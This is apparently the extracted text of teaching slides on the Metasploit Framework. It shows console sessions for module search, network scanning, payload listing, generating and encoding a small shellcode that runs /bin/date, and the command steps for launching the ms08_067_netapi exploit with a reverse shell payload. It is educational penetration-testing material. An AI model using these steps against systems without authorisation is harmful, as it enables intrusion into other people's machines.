> msfconsoleUnable to handle kernel NULL pointer dereference at virtual address 0xd34db33fEFLAGS: 00010046eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60ds: 0018 es: 0018 ss: 0018Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090.90909090.09090900 90909090.90909090.09090900 .......................... cccccccccccccccccccccccccc cccccccccccccccccccccccccc ccccccccc................. cccccccccccccccccccccccccc cccccccccccccccccccccccccc .................ccccccccc cccccccccccccccccccccccccc cccccccccccccccccccccccccc .......................... ffffffffffffffffffffffffff ffffffff.................. ffffffffffffffffffffffffff ffffffff.................. ffffffff.................. ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00Aiee, Killing Interrupt handlerKernel panic: Attempted to kill the idle task!In swapper task - not syncing... =[ metasploit v4.10.0-2014082101 [core:4.10.0.pre.2014082101 api:1.0.0]]+ -- --=[ 1331 exploits - 722 auxiliary - 214 post ]+ -- --=[ 340 payloads - 35 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msfconsole

msfconsolemsf > pwd[*] exec: pwd

/rootmsf > ls -a[*] exec: ls -a

.

..

.bash_history

.bashrc

.cache

...

msf > help searchUsage: search [keywords]

Keywords: app : Modules that are client or server attacks author : Modules written by this author bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID name : Modules with a matching descriptive name...

Linux commands Help

msf > search cve:2009 type:exploit app:clientMatching Modules================ Name Disclosure Date ---- ---------------

Rank Description ---- -----------

exploit/multi/browser/firefox_escape_retval 2009-07-13normal Firefox 3.5 escape() Return Value Memory Corruption

exploit/multi/browser/itms_overflow 2009-06-01great Apple OS X iTunes 8.1.1 ITMS Overflow

exploit/windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent Symantec Altiris Deployment Solution ActiveX Control Arbitrary

File ...

Search

msfconsoleDatabase-backing

# service postgresql start[ ok ] Starting PostgreSQL 9.1 database server: main.

# service metasploit startConfiguring Metasploit...Creating metasploit database user 'msf3'...Creating metasploit database 'msf3'...insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.[ ok ] Starting Metasploit worker: worker.msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml[*] Rebuilding the module cache in the background...msf > db_status[*] postgresql connected to msf3msf > nmap -Pn -A -oX results.xml 172.15.67.141 [*] exec: nmap -Pn -A -oX results.xml 172.15.67.141msf > db_import results.xmlhosts –c address

> msfconsolemsf > show payloads

Payloads========

Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline aix/ppc/shell_interact normal AIX execve Shell for inetd aix/ppc/shell_reverse_tcp normal AIX Command... linux/x86/chmod normal Linux Chmod linux/x86/exec normal Linux Execute Command linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6) linux/x86/meterpreter/bind_nonx_tcp normal Linux Meterpreter, Bind TCP Stager... windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command... windows/shell_hidden_bind_tcp normal Windows Command Shell, Hidden Bind ... windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!" windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP ... windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP ...

msfconsole

msf > info windows/speak_pwned

Name: Windows Speech API - Say "You Got Pwned!" Module: payload/windows/speak_pwned Platform: Windows Arch: x86Needs Admin: No Total size: 247 Rank: Normal

Provided by: Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>

Description: Causes the target to say "You Got Pwned" via the Windows Speech API

msfconsole

# msfpayload linux/x86/exec S

Name: Linux Execute Command Module: payload/linux/x86/exec Platform: Linux Arch: x86Needs Admin: No Total size: 158 Rank: Normal

Provided by: vlad902 <vlad902@gmail.com>

Basic options:Name Current Setting Required Description---- --------------- -------- -----------CMD yes The command string to execute

msfpayload

# msfpayload linux/x86/exec CMD="/bin/date" C/* * linux/x86/exec - 45 bytes * ... * AppendExit=false, CMD=/bin/date */unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68""\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0a\x00\x00\x00\x2f""\x62\x69\x6e\x2f\x64\x61\x74\x65\x00\x57\x53\x89\xe1\xcd\x80";

# msfpayload linux/x86/exec CMD="/bin/date" J// linux/x86/exec - 45 bytes// ...// AppendExit=false, CMD=/bin/date%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u0ae8%u0000%u2f00%u6962%u2f6e%u6164%u6574%u5700%u8953%ucde1%u4180

(Javascript)

(C)

# msfpayload linux/x86/exec CMD="/bin/date" R > foo# hexdump -C foo00000000 6a 0b 58 99 52 66 68 2d 63 89 e7 68 2f 73 68 00 |j.X.Rfh-c..h/sh.|00000010 68 2f 62 69 6e 89 e3 52 e8 0a 00 00 00 2f 62 69 |h/bin..R...../bi|00000020 6e 2f 64 61 74 65 00 57 53 89 e1 cd 80 |n/date.WS....|

(Raw)msfpayload

# ndisasm -b 32 foo -s 0x2700000000 6A0B push byte +0xb00000002 58 pop eax00000003 99 cdq00000004 52 push edx00000005 66682D63 push word 0x632d00000009 89E7 mov edi,esp0000000B 682F736800 push dword 0x68732f00000010 682F62696E push dword 0x6e69622f00000015 89E3 mov ebx,esp00000017 52 push edx00000018 E80A000000 call dword 0x270000001D 2F das0000001E 62696E bound ebp,[ecx+0x6e]00000021 2F das00000022 6461 fs popad00000024 7465 jz 0x8b00000026 00 db 0x0000000027 57 push edi00000028 53 push ebx00000029 89E1 mov ecx,esp0000002B CD80 int 0x80

; eax = 0xb (sys_execve)

; edx = 0x0

; TOS = “-c\0”

; *edi= “-c\0”

; push “/bin/sh\0”

; *ebx= /bin/sh\0; push 0

; /bin/date

; sync-point: 0x27

eax: 0xb (sys_execve)*ebx: “/bin/sh\0-c\0”*ecx: environment block

msfpayload

# msfencode -b '\x00\x20' -i foo -t raw > foo_new[-] cmd/powershell_base64 failed: Encoding failed due to a bad character (index=15, char=0x00)[*] x86/shikata_ga_nai succeeded with size 72 (iteration=1)

# ndisasm -b 32 foo_new00000000 B82BF03A30 mov eax,0x303af02b00000005 DAD7 fcmovbe st700000007 D97424F4 fnstenv [esp-0xc]0000000B 5D pop ebp0000000C 31C9 xor ecx,ecx0000000E B10C mov cl,0xc00000010 314513 xor [ebp+0x13],eax00000013 034513 add eax,[ebp+0x13]00000016 83EDD7 sub ebp,byte -0x2900000019 12CF adc cl,bh0000001B 5A pop edx0000001C 2C8B sub al,0x8b0000001E A9C95443E7 test eax,0xe74354c900000023 8E11 mov ss,[ecx]00000025 749F jz 0xffffffc600000027 7F52 jg 0x7b00000029 1360E8 adc esp,[eax-0x18]0000002C BB8109864A mov ebx,0x4a86098100000031 A6 cmpsb00000032 98 cwde00000033 BE46291D3F mov esi,0x3f1d294600000038 794B jns 0x850000003A 7451 jz 0x8d0000003C AA stosb0000003D EF out dx,eax0000003E E7D9 out 0xd9,eax00000040 D1EF shr edi,100000042 B072 mov al,0x7200000044 90 nop00000045 11F3 adc ebx,esi00000047 F5 cmc

msfencode

# /usr/share/metasploit-framework/tools/nasm_shell.rbnasm > mov esp,3000000000 BC1E000000 mov esp,0x1e

nasm_shell.rb

Metasploit FrameworkI. Information Gathering

msf > nmap -Pn -A -oX results.xml 172.15.67.0/24[*] exec: nmap -Pn -A -oX results.xml 172.15.67.0/24...msf > search portscan... auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner auxiliary/scanner/portscan/tcp normal TCP Port Scanner...use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds

msf auxiliary(tcp) > show optionsmsf auxiliary(tcp) > set RHOSTS 172.16.57.141RHOSTS => 172.16.57.141msf auxiliary(tcp) > run[*] 172.16.57.141:3790 - TCP OPEN...

Metasploit FrameworkII. Find Vulnerability

• nessus• nexpose• scanner modules

Metasploit FrameworkIII. Pick payload

msf > show exploitsmsf > use windows/smb/ms08_067_netapimsf > show options

msf > show payloadsmsf > set payload windows/shell/reverse_tcpmsf > show options

msf > show targetsExploit targets:

Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (AlwaysOn NX) 4 Windows XP SP2 English (NX)

msf > set target 3msf > exploit

IV. Exploit

V. Exploit more

VI. Pivot

Metasploit FrameworkV. Exploit

Credits• D. Kennedy, J. O’Gorman, D. Kearns, and M. Aharoni, Metasploit: The Penetration Tester’s Guide, No Starch

Press 2011.• S. Ngan, J. Chau,and G. Duguies, EC521 final group project: Metasploit, 2011.